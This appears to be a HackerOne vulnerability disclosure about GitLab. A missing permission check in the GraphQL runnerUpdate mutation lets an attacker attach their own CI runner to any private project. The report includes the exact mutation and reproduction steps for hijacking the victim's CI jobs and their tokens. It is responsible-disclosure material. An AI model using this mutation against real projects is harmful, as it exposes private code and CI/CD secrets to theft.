Malicious Runner Attachment via GraphQL
HackerOne report #1969599 by yvvdwf on 2023-05-02, assigned to @rshambhuni:
Report
Hi,
This GraphQL endpoint allows to associate a runner to a project without checking whether the current user has permission on the project. It leads to the ability to assign a (malicious) runner to any project. Consequently this is a possible attack vector to "steal" runner jobs.
Step to reproduce
-
Prepare: as victim, to create a private project. Note the project ID, e.g.,
111111111. -
As attacker:
1.1 In an existing project, or create a new one, go to
Settings/CI/CD/Runners. Follow the steps inProject runnersto setup a runner for this project.1.2. After registering the runner, edit it by unchecking
Lock to current projects, then clickSave changes1.3. Note the ID of the runner, e.g.,
9999999991.4. Open https://gitlab.com/-/graphql-explorer, and run the following query after replacing IDs of your runner and victim project:
mutation {
runnerUpdate(input:{id: "gid://gitlab/Ci::Runner/999999999",
associatedProjects: ["gid://gitlab/Project/111111111"]
}){
runner {
ownerProject {fullPath}
}
errors
}
}-
As the victim, open the private project and goto
Settings/CI/CD/Runners. You should see that the runner is now in the list ofAssigned project runners2.1 Add
.gitlab-ci.ymlfile to the project, if it does not exist, using the following content:
build-job:
script:
- echo "This script will be runned in a malicious runner" 2.2 When going to CI/CD/Jobs, you should see that the job is executed by the runner above
Impact
The impact should be similar with CVE-2022-0735 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6).. That is, an unauthorized user is able to steal runner jobs which are used to uncover private information, such as, project code, CI/CD job tokens
How To Reproduce
Please add reproducibility information to this section: